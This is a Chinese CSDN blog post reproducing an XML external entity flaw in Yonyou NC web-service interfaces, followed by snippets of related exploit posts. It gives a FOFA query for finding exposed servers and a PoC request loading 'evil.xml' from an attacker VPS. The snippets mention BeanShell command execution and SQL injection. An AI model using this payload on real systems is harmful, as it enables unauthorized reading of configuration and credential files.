用友 NC 24处接口XML实体注入漏洞复现

已于 2024-03-15 17:09:06 修改
阅读量1.2k 收藏 1
点赞数 8
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-02-28 20:48:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/136353908
版权
本文介绍了用友NC存在的多处XML实体注入漏洞,允许未认证攻击者读取敏感文件,严重影响系统安全性。通过复现环境和POC详细展示了漏洞利用过程,并给出了关闭暴露接口或限制访问权限的修复建议。
摘要由CSDN通过智能技术生成

0x01 产品简介

用友 NC 是用友网络科技股份有限公司开发的一款大型企业数字化平台。

0x02 漏洞概述

用友 NC 多处接口存在XML实体注入漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:

app="用友-UFIDA-NC"

0x04 漏洞复现 

PoC

GET /uapws/service/存在漏洞的接口?xsd=http://VPS/evil.xml HTTP/1.1
Host: your-ip
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
专栏目录
订阅专栏
用友NC uapjs RCE漏洞复现(CNVD-C-2023-76801)
0xSec
06-29 1万+
用友NCNC Cloud系统存在任意文件上传漏洞,攻击者可通过uapjs(jsinvoke)应用构造恶意请求非法上传后门程序,此漏洞可以给NC服务器预埋后门,从而可以随意操作服务器
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 1262
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
漏洞复现-用友U8Cloud ServiceDispatcher反序列化漏洞
最新发布
玄道的网安博客
08-13 1146
在PoC中,代码似乎是发送一个特定的序列化数据到/ServiceDispatcherServlet,然后检查响应是否包含特定的字节序列[]byte{0x72, 0x71, 0x89, 0x01}(可能是某种标识符或特定的序列化对象的标记)。具体的漏洞触发点可能与不当的Java对象序列化理有关,因为代码中特别检查了响应的Content-Type是否为application/x-java-serialized-object。近期,用友官方收到一则漏洞情报,及时发布了补丁,成功修复了一个前台反序列化漏洞
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 9238
用友NC 漏洞汇总
用友NC-uapjs代码执行漏洞(含批量验证poc),2024年最新网络安全开发两年
m0_60226911的博客
04-16 331
这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。通过MethodInvocationHandler类中的异常理信息也可以看出,该漏洞可以通过传入的json来调用实现过的本地服务接口。或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!用友NC Cloud 存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。包括了nc所有系列版本。
用友NC BeanShell存在命令执行漏洞(CNVD-2021-30167)
maverickpig的博客
03-10 6217
用友命令执行漏洞复现
用友NC BeanShell RCE漏洞
qq_44484541的博客
11-01 997
用友 NC 是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。用友 NC 由于对外开放了 BeanShell 接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码从而获取服务器权限。该漏洞为第三方 Jar 包漏洞导致,用友 NC 官方已发布安全补丁,建议使用该产品的用户及时安装该漏洞补丁包。3.这里有执行代码的接口,输入payload如:exec(“whoami”);2.访问路径/servlet/~ic/bsh.servlet.BshServlet。
用友NC系统querygoodsgridbycode接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-24 377
用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
用友 NC showcontent SQL注入漏洞复现
0xSec
04-20 665
用友NC /ebvp/infopub/showcontent 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞
xiaokp7的博客
07-24 337
用友NC用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
用友 NC IUpdateService XXE漏洞复现
0xSec
01-06 1469
用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统于极不安全状态。
漏洞复现用友NC——文件上传漏洞
weixin_54799594的博客
07-16 1191
漏洞复现过程记录
某购物商城系统commodtiy接口存在任意文件上传漏洞
weixin_43167326的博客
05-10 915
某购物商城系统commodtiy接口存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
用友NC warningDetailInfo SQL注入漏洞复现
0xSec
05-22 688
用友NC /ebvp/infopub/warningDetailInfo接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
【HW必备】用友NC-Cloud存在17漏洞合集
wananxuexihu的博客
06-24 1571
漏洞挖掘是指通过分析软件、系统或网络中存在安全漏洞来发现并利用这些漏洞漏洞挖掘是信息安全领域的一项重要工作,可以帮助企业和组织提高系统安全性,避免黑客攻击和数据泄露。漏洞挖掘的流程一般可以概括为以下几个步骤:确定目标:确定要挖掘的软件或系统。这可能是一个应用程序、操作系统、网络设备或其他系统。收集信息:收集有关目标的信息,包括架构、协议、版本和配置等。这些信息可以通过互联网搜索、手动扫描、自动化工具和其他途径获得。分析漏洞:通过手动和自动化技术进行漏洞分析,识别潜在的漏洞类型和攻击面。
【CNVD-2021-30167】用友NC BeanShell 漏洞复现(CNVD-2021-30167)
千寻的博客
01-17 5165
用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
用友-NC-Cloud远程代码执行漏洞(你懂的)
weixin_43689708的博客
07-22 1675
用友NC Cloud大型企业数字化平台,深度应用新一代数字智能技术,完全基于云原生架构,打造开放、互联、融合、智能的一体化云平台,聚焦数智化管理、数智化经营、数智化商业等三大企业数智化转型战略方向,提供涵盖数字营销、财务共享、全球司库、智能制造、敏捷供应链、人才管理、智慧协同等18大解决方案,帮助大型企业全面落地数智化。
用友NC网银XML配置文件详解V1.0
本文档详细介绍了用友NC 5系列网银部分的数据交换XML格式规则,主要适用于银行与企业系统的交互,以便进行诸如余额查询、对账单下载、代发代扣、集团支付、网银支付等多种业务操作。XML配置文件在ebank目录下按照...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值